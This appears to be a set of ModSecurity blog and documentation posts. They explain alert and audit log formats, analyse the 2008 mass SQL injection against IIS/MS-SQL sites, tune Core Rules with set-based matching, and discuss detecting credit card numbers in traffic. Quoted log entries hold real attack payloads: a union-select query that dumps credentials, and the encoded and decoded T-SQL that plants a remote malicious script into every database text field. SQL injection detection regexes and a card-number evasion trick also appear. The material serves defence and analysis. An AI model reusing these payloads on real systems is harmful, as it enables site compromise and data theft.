The engine message consists of two parts. The first part tells you whether ModSecurity acted to interrupt transaction or rule processing. If it did nothing the first part of the message will simply say "Warning". If an action was taken then one of the following messages will be used:

  • Access denied with code %0 - a response with status code %0 was sent.
  • Access denied with connection close - connection was abruptly closed.
  • Access denied with redirection to %0 using status %1 - a redirection to URI %0 was issued using status %1.
  • Access allowed - rule engine stopped processing rules (transaction was unaffected).
  • Access to phase allowed - rule engine stopped processing rules in the current phase only. Subsequent phases will be processed normally. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.
  • Access to request allowed - rule engine stopped processing rules in the current phase. Phases prior to request execution in the backend (currently phases 1 and 2) will not be processed. The response phases (currently phases 3 and 4) and others (currently phase 5) will be processed as normal. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.

The second part of the engine message explains why the event was generated. Since it is automatically generated from the rules it will be very technical in nature talking about operators and their parameters and give you insight into what the rule looked like. But this message cannot give you insight into the reasoning behind the rule. A well-written rule will always specify a human-readable message (using the msg action) to provide further clarification.
The metadata fields are always placed at the end of the alert entry. Each metadata field is a text fragment that consists of an open bracket followed by the metadata field name, followed by the value and the closing bracket. What follows is the text fragment that makes up the id metadata field.

[id "960034"]

The following metadata fields are currently used:

  1. id - Unique rule ID, as specified by the id action.
  2. rev - Rule revision, as specified by the rev action.
  3. msg - Human-readable message, as specified by the msg action.
  4. severity - Event severity, as specified by the severity action.
  5. unique_id - Unique event ID, generated automatically.
  6. uri - Request URI.
  7. logdata - contains transaction data fragment, as specified by the logdata action.

Alerts in Apache

Every ModSecurity alert conforms to the following format when it appears in the Apache error log:

[Sun Jun 24 10:19:58 2007] [error] [client 192.168.0.1] ModSecurity: ALERT_MESSAGE

The above is a standard Apache error log format. The "ModSecurity:" prefix is specific to ModSecurity. It is used to allow quick identification of ModSecurity alert messages when they appear in the same file next to other Apache messages.
The actual message (ALERT_MESSAGE in the example above) is in the same format as described in the Alerts section.

Alerts in Audit Log

Alerts are transported in the H section of the ModSecurity Audit Log. Alerts will appear each on a separate line and in the order they were generated by ModSecurity. Each line will be in the following format:

Message: ALERT_MESSAGE

Below is an example of an entire H section (followed by the Z section terminator):

--c7036611-H--
Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 ?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x
  
--c7036611-Z--

Audit Log

ModSecurity records one transaction in a single audit log file. Below is an example:

--c7036611-A--
[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995 80.68.80.233 80
--c7036611-B--
GET //EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,char(77),
 password,char(77),email_address,char(77),info,char(77),user_level,char(77))/**/from
 /**/eb_members/**/where/**/userid=1/*http://kamloopstutor.com/images/banners/on.txt?
 HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.example.com
User-Agent: libwww-perl/5.808
  
--c7036611-F--
HTTP/1.1 404 Not Found
Content-Length: 223
Connection: close
Content-Type: text/html; charset=iso-8859-1
  
--c7036611-H--
Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 ?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Apache-Error: [file "/tmp/buildd/apache2-2.x.x/build-tree/apache2/server/core.c"] [line 3505] [level 3]
 File does not exist: /var/www/EvilBoard_0.1a
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x
  
--c7036611-Z--

The file consist of multiple sections, each in different format. Separators are used to define sections:

--c7036611-A--

A separator always begins on a new line and conforms to the following format:

  1. Two dashes at the beginning.
  2. Unique boundary, which consists from several hexadecimal characters.
  3. One dash character.
  4. Section identifier, currently a single uppercase letter.
  5. Two trailing dashes at the end.

Refer to the documentation for SecAuditLogParts for the explanation of each part.

 

SQL Injection Attack Infects Thousands of Websites

Here is a snippet from the just released SANS NewsBites letter:

"TOP OF THE NEWS --SQL Injection Attack Infects Thousands of Websites (January 7 & 8, 2008) At least 70,000 websites have fallen prey to an automated SQL injection attack that exploits several vulnerabilities, including the Microsoft Data Access Components (MDAC) flaw that Microsoft patched in April 2006. Users have been redirected to another domain [u c 8 0 1 0 . c o m], that attempted to infect users' computers with keystroke loggers. Many of the sites have since been scrubbed. The attack is similar to one launched last year against the Miami Dolphins' Stadium website just prior to the Super Bowl."

Additional coverage is available from several places:

So, there is a new, nasty bot on the loose that is targeting websites that use IIS/MS-SQL DB. It is exploiting non-specific SQL Injection vulnerabilities that exist in websites to inject malicious JavaScript into all fields. Once it gets the victims to the web site it will try and exploit various known browser and plugin vulnerabilities. Essentially, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

While there has been much focus on the goal of the attack -- which is to try and exploit some browser (client) vulnerabilities to perhaps install some trojans or other malware -- not as much attention has been paid to actual attack vector that lead to the compromise: the SQL injection attack itself.

Here is an example IIS log entry of the SQL Injection attack that was posted to a user forum:

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0�4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002
C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E007
80074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100360037002
90020004F00500045004E0020005400610062006C0065005F0043007500720073006F007200200046004500540043004
80020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007
200200049004E0054004F002000400054002C004000430020005700480049004C0045002800400040004600450054004
30048005F005300540041005400550053003D0030002900200042004500470049004E002000650078006500630028002
70075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B004
00043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006
800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F0063002E007500630038003000310030002E0063006F006D002
F0030002E006A0073003E003C002F007300630072006900700074003E002700270027002900460045005400430048002
0004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F0072002
00049004E0054004F002000400054002C0040004300200045004E004400200043004C004F00530045002000540061006
2006C0065005F0043007500720073006F00720020004400450041004C004C004F0043004100540045002000540061006
2006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);�|178|80040e14|
Unclosed_quotation_mark_before_the_character_string_�G;DECLARE_@S_NVARCHAR(4000);SET_@S=CAST
(0�4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002
C00400043002000′. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library)
 - 500 15248

If you decode the CAST values, here is the actual SQL that is being injected:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name 
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM  
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T 
varchar(255),@C

Mitigation Options

There are many remediation steps that can and should be taken.

Immediate Fix: Use ModSecurity and the Core Rules

If these web sites were front-ended by an Apache reverse proxy server (with ModSecurity and the Core Rules) then the back-end IIS/MS SQL application servers would have been protected against this attack. The free Core Rules, which are available for download from the the ModSecurity web site, include SQL injection rules that would have identified and blocked this specific automated attack. Specifically, Rule ID 950001 in the modsecurity_crs_40_generic_attacks.conf file would have triggered on the "cast(" portion of the SQL injection string.

Mid-Term/Long-Term Fix: Correct the Code

Web Developers should identify and correct any Input Validation errors in their code.

 

Speaking About ModSecurity at ApacheCon Europe 2008

I will be speaking about ModSecurity at ApacheCon Europe in Amsterdam later this year. I hear ApacheCon Europe 2007 (also in Amsterdam) was great so I am looking forward to participating this year. Interestingly, for some reason or another, this will be the first time ModSecurity will be "officially" presented to the Apache crowd, in spite of the fact we've been going at it for years. As always, the best part is meeting the people you've been communicating with for years.

"Intrusion detection is a well-known network security technique -- it introduces monitoring and correlation devices to networks, enabling administrators to monitor events and detect attacks and anomalies in real-time. Web intrusion detection does the same but it works on the HTTP level, making it suitable to deal with security issues in web applications. This session will start with an overview of web intrusion detection and web application firewalls, discussing where they belong in the overall protection strategy. The second part of the talk will discuss ModSecurity and its capabilities. ModSecurity is an open source web application firewall that can be deployed either embedded (in the Apache HTTP server) or as a network gateway (as part of a reverse proxy deployment). Now in its fifth year of development, ModSecurity is mature, robust and flexible. Due to its popularity and wide usage it is now positioned as a de-facto standard in the web intrusion detection space."

 

Set-based Pattern Matching Example

ModSecurity 2.5 introduces two new operators (@pm and @pmFromFile) which implement set-based pattern matching by using the Aho-Corasick algorithm. Set-based matching is much quicker then using Regular Expressions. For those users who are concerned with performance (meaning trying to limit latency from a legitimate client's perspective) then set-based pattern matching is a great enhancement. If rules are written properly, you can achieve the same level of security by using these new operators while simultaneously decreasing the time it takes to complete the check.

The key is to make sure that the set-based patterns (plain text strings) are critial to the success of the attack. So, when performing technical vulnerability research, you must first search for all of the necessary conditions for an attack to succeed. You then start by sending attacks that triggers the vulnerability remotely. The attack should be used to vary all the �interesting-looking� parts of the attack. Changes are made one at a time, in steps, keeping careful notes. (Strings, flags, length values, banners, version numbers, character encoding, white space� the list goes on. All are good things to vary.) If the attack succeeds even when a particular variable is set to a random value, that variable is not important for the signature or rule creation. Eventually you can identify the complete set of variables that are important to the attack�s success, and arrive at a set of criteria that must be collectively satisfied for any attack to succeed. If there are multiple distinct attack vectors, you must perform this analysis on each one separately.

Given a set of criteria that must be satisfied for an attack to succeed, it is possible to describe rule logic that has virtually zero false negatives. That is, an attack simply cannot succeed unless the HTTP request has exactly the characteristics that the rule is looking for. Once you have identified these necessary components, they can then be used as the input strings to the set-based matching operators.

While the set-based matching is very fast, you will still be missing some logic to be able to validate the attack. It is for this reason that a good approach is to combine set-based matching with regular expression rules by chaining the indivudual rules together. Essentially, the 1st part of the chained rule uses the set-based matching operator to run as a pre-qualifier to very quickly check to see if the transaction data has a high likelihood of matching. If the set-based matching portion matches, then th 2nd part of the chained rule (which uses the standard regular expression strings) is executed. The end result to this configuration is that for normal, non-malicious users, the latency for running all of the ModSecurity inspection rules will be decreased.

Let's take a look at this Blind SQL Injection rule from the Core Rules -

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer
"(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints
|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|
relationship|column|object)s|ysql\.user)|c(?:onstraint_type|harindex)|waitfor\b\W*?\bdelay|
attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)" \
"capture,t:htmlEntityDecode,t:lowercase,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,
msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"

We can now update this rule to become a chained rule and use the @pm operator to run some pre-qualifier checks -

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer 
"@pm sys.user_triggers sys.user_objects @@spid msysaces instr sys.user_views sys.tab 
charindex sys.user_catalog constraint_type locate select msysobjects attnotnull sys.user_tables
sys.user_tab_columns sys.user_constraints mysql.user sys.all_tables msysrelationships 
msyscolumns msysqueries" \
"chain,t:htmlEntityDecode,t:lowercase,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,
msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer 
"(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints
|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|
relationship|column|object)s|ysql\.user)|c(?:onstraint_type|harindex)|attnotnull)\b|(?:locate|
instr)\W+\()|\@\@spid\b)" "capture,t:htmlEntityDecode,t:lowercase,t:replaceComments"

Now, let's test out the new rules to see what the processing time is for each of these rules if the request is normal. First let's look at what the time is for the normal Core Rule -

Executing operator "rx" with param "(?:\\b(?:(?:s(?:ys\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|obj
ect|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\b.{0,40}\\b(?:substring|ascii|user))|m(?:sys(
?:(?:queri|ac)e|relationship|column|object)s|ysql\\.user)|c(?:onstraint_type|harindex)|waitfor\\b\\W*?\
\bdelay|attnotnull)\\b|(?:locate|instr)\\W+\\()|\\@\\@spid\\b)" against ARGS:LoginEmail.
Target value: "aaa"
Operator completed in 14 usec.

Notice that it took approximately 14 usec for this optimized regular expression rule to run. Now, let's contrast this with the same rule running with the @pm operator -

Executing operator "pm" with param "sys.user_triggers sys.user_objects @@spid msysaces instr sys.user_v
iews sys.tab charindex sys.user_catalog constraint_type locate select msysobjects attnotnull sys.user_t
ables sys.user_tab_columns sys.user_constraints mysql.user sys.all_tables msysrelationships msyscolumns
 msysqueries" against ARGS:LoginEmail.
Target value: "aaa"
Operator completed in 9 usec.

As you can see, the processing time was decreased down to just 9 usec! This may not seem like much, however keep in mind that this is just for one rule. The overall effect of using the set-based pattern matching operators will become apparent when you are using a larger number of rules. Keep an eye out for updates to the Core Rules as they will be changing in the future to better leverage these new operators.

 

Detecting Credit Card Numbers in Network Traffic

1. Introduction

The Payment Card Industry Data Security Standard (PCI-DSS for short) requires that credit card numbers are not transmitted in clear and are not presented to users unmasked. Naturally a network monitoring systems such as an IDS or an IPS seems like a natural enforcement system to ensure that such information is not sent against the regulation over a network but a closer examination shows that a correct implementation is far from trivial. This writeup discusses several aspects of implementing a network monitoring system to detect leakage of credit card numbers:

  • Matching a credit card number sequence
  • Handling false positives using exceptions
  • Additional considerations, including evasion, logging, performance and other sensitive patterns.

2. Matching a Credit Card Number

2.1 Matching a Credit Card Number Sequence

A credit card number includes 13 to 16 digits. In addition, real world presentation of a credit card number often include delimiters such as dashes or spaces, usually in specific positions. The following regular expression can be used to match credit card number sequences:

\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4}

2.2 Boundaries

For long sequences of digits, which are common in network traffic, the above regular expression would match multiple sequences of the desired length. In order to avoid that, we need to define the sequence delimiters. What can or cannot be a valid delimiter might vary according to the application. Not requiring any delimiter would generate many false positives while requiring delimiters might lead to false negatives. For example, should we allow a leading "0"?

A reasonable choice for a delimiter would be any non-digit character. The resulting regular expression is:

(?<!\d)\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4}(?!\d)

or if a regular expression engine does not support look-ahead and look-behind searches:

(?:^|[^\d])(\d{4}[\- ]?\d{4}[\- ]?\d{2}[\- ]?\d{2}[\- ]?\d{1,4})(?:[^\d]|$)

2.3 Validate the number against the LUHN checksum algorithm

However sequences of 13 to 16 are not always credit card numbers. There are many other long numbers in typical network traffic. For example, we often find that identification numbers such as product IDs used in online stores are also 13-16 digit numbers. Luckily, a credit card number has to conform to the LUHN checksum function. A monitoring system can implement this algorithm and check that each sequence of digits detected is a valid credit card number.

Is this enough to avoid false positives? The LUHN function is a checksum function that generates an additional digit for each number and therefore it matches 1 out of 10 consecutive numbers. Since in most cases applications use numbers of this length as identification numbers, the applications would probably use many consecutive numbers, and therefore 1 out of 10 numbers used would be a valid credit card number. Therefore validating sequences using the LUHN formula reduces false positives by 90% but does not eliminate them.

2.4 Checking Prefixes

To reduce the amount of false positive, a monitoring system can check that the credit card number is not just valid but was also assigned. Naturally the monitoring system cannot include a list of all assigned numbers, but it can check for prefixes which where assigned to different financial institutes. A pretty good table of assigned prefixes can be found on Wikipedia.

Prefixes further reduce false positives and can be implemented using a regular expression. Assigned numbers account for 1% to 17% of the valid credit card numbers, depending on the sequence length. Prefixes are especially useful for eliminating the less often used sequences of 14 and 15 digits (1.2% and 2.5% prefix coverage respectively), leaving us with mostly the 13 and 16 digits sequences. 13 digits sequences are a mystery: it is not clear whether Visa still uses them.

On the down side, using prefixes can lead to false negatives and require updates to the monitoring system. For example, the Australian Bankcard range is marked as not in use in the Wikipedia table, but we have recently saw such a number in actual traffic.

Using the LUHN formula and prefix validation, false positive rate can be reduced to approximately 1% of the rate achieved using pattern matching only.

3. Handling False Positives Using Exceptions

In real world systems 1% is still a high number, especially as sequences of digits are quite common in network traffic. If a human would have to examine even hundreds of alerts a day, the monitoring system becomes not useful. How can we make the accuracy of the detection system better?

One way to do that would be to create exceptions for traffic known to generate such false positives. Exception can be defined both for non credit card sequences as well as for intentional and legal transmission of credit card numbers.

Such exceptions are a curse as much as a blessing, as overusing them or defining them too broadly will open big security holes. Lets take for example a 16 digit sequence used as a product ID in a web site. An exception using firewall like rules which support only IP address and port would have to ignore an entire web site to take care of such an issue. On the other hand an application aware monitoring system, such as a Web Application Firewall, can define a much more fine grained exception. In the case above, a WAF rule can be defined to exclude credit card number detection for the specific field on a specific page used for the product ID.

Let's assume for example that a ModSecurity rule number 955555 detects credit cards in an application output, but the page /support/manual_payment.php, available only to store personal, must display a credit card number. The following is a simple ModSecurity exception for ignoring this rule for a single page:

<LocationMatch "/support/manual_payment.php">
    SecRuleRemoveById 955555
</LocationMatch>

The exception can further check that only a single credit card number is displayed on this page, and only in a certain part of the page.

Further more, the product ID may have some unique attributes such as its own prefix or surrounding text that can help to make the exception narrower.A good example is Google AdSense. A site running Google ads needs to add the following piece of code to each page displaying ads:

<script type="text/javascript"><!--
google_ad_client = "pub-0000000000000000";
google_alternate_color = "ffffff";
...

Many times the 16 digits ID in the google_ad_client parameter is a valid credit card number. The following modified regular expression will compensate for that:

(?<!google_ad_client = \"pub-)(?<!\d)(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?!\d)

4. Other Considerations

4.1 Evasion

Evasion techniques are a serious problem for intrusion detection system in general and even more so for detecting credit card numbers. Even the simplest transformation function performed on a sequence will enable it to bypass detection. For example, an attacker performing an SQL injection attack in order to smuggle card numbers out, could craft an SQL statement in such away that each credit card number is multiplied by 2. As a result, the monitoring system would not detect the output as a valid credit card number. Once the information is out, the attacker can easily divide the number by 2 to get the original credit card number. Because it is so easy to evade them, network monitoring system, or actually any other egress inspection system are not suitable for detecting malicious theft of credit card numbers. To avoid such credit card numbers theft one must focus on inbound protection.

But even unintentional leakage might be subject to unintentional evasion. A good example is encryption: in order to provide better security, many applications use encryption when transferring information over the network. Such encryption would hide the traffic from the monitoring system.While most network layer IDS solutions fail to decrypt SSL, web layer security solutions always do that. You can read more about the SSL blind spot in this thread.

Another problem would be encoding systems built into network protocols such as Unicode encoding or compression of HTTP traffic and base64encoding of e-mail messages. Again, network only monitoring systems would not detect the encoded traffic, while an application aware monitoring system would decode prior to inspection and therefore detect the leakage.

4.2 Logging

Logging is just as important as detection for a monitoring system. This is all the more so with credit card numbers detection: in many cases a security breach can be mitigated better if the organization knows what actual information leaked. For example, different state disclosure bills such as California SB-1386 require an organization to notify all affected clients in case of a breach. If the organization does not know who the affected clients are, it must notify everyone, raising the price of the breach and the media exposure.

Unfortunately, logging credit card leakage incidents is not trivial. PCI DSS does not allow the credit card number itself to be logged. On the other hand, the logging record must include enough information to be useful. Useful implementation must keep two levels of log:

  1. Alert logs that can be used to analyze what happened, but do not include the actual credit card number, or possibly a masked version of it.
  2. Encrypted store for the credit card data itself.

4.3 Performance

Regular expressions are not very efficient and therefore most IDS try to avoid testing the payload for a large number of regular expressions. To achieve that, an IDS would first use an efficient parallel matching algorithm such as Aho-Corasick, which is super fast and uses a single cycle through the payload to check for all signatures. In the other hand parallel matching can only matches simple strings. Only if a certain simple string matches, a follow-up regular expression is tested.To reduce the number of regular expression tests required, the parallel matching algorithm searched the longest constant string extracted from every regular expression.

Unfortunately the regular expressions presented so far in this write-up do not have any fixed string in them as the look for a sequence of digits. Parallel matching algorithms can be adapted to search efficiently for a string of character groups, digits in this case, rather than a string of characters, but normal implementations found in most IDS do not support it.

Additionally, the performance cost of running a checksum algorithm over any sequence matching must be taken into account.

4.4 Other Sensitive Identifiers

While credit card numbers are the most well known sensitive identifier for which PCI DSS requires special attention, it is neither the only one, nor the most sensitive. Card Verification Code (CVV) is a 3 or 4 digit code on the back of a credit card that is often used as an additional identification number in online transactions. CVV is even more sensitive than a credit card number, but much harder to detect as it is so short and has no checksum digit.

One way to detect use of CVV numbers is to find a 3 or 4 digits value in a field on a form where a credit card number was found. This method is far from immune to false positives, but in paranoid environments might pull the trick.

5. Conclusion

Detecting theft of credit card numbers by monitoring network traffic is very difficult, but such monitoring can be useful for detecting unintentional leakage of credit card numbers. In order to do so the monitoring system has to be application and protocol aware so that it can both compensate for encoding and encryption applied to the data as well as provide a tool for creating exceptions for valid credit card numbers or other information detected as credit card numbers.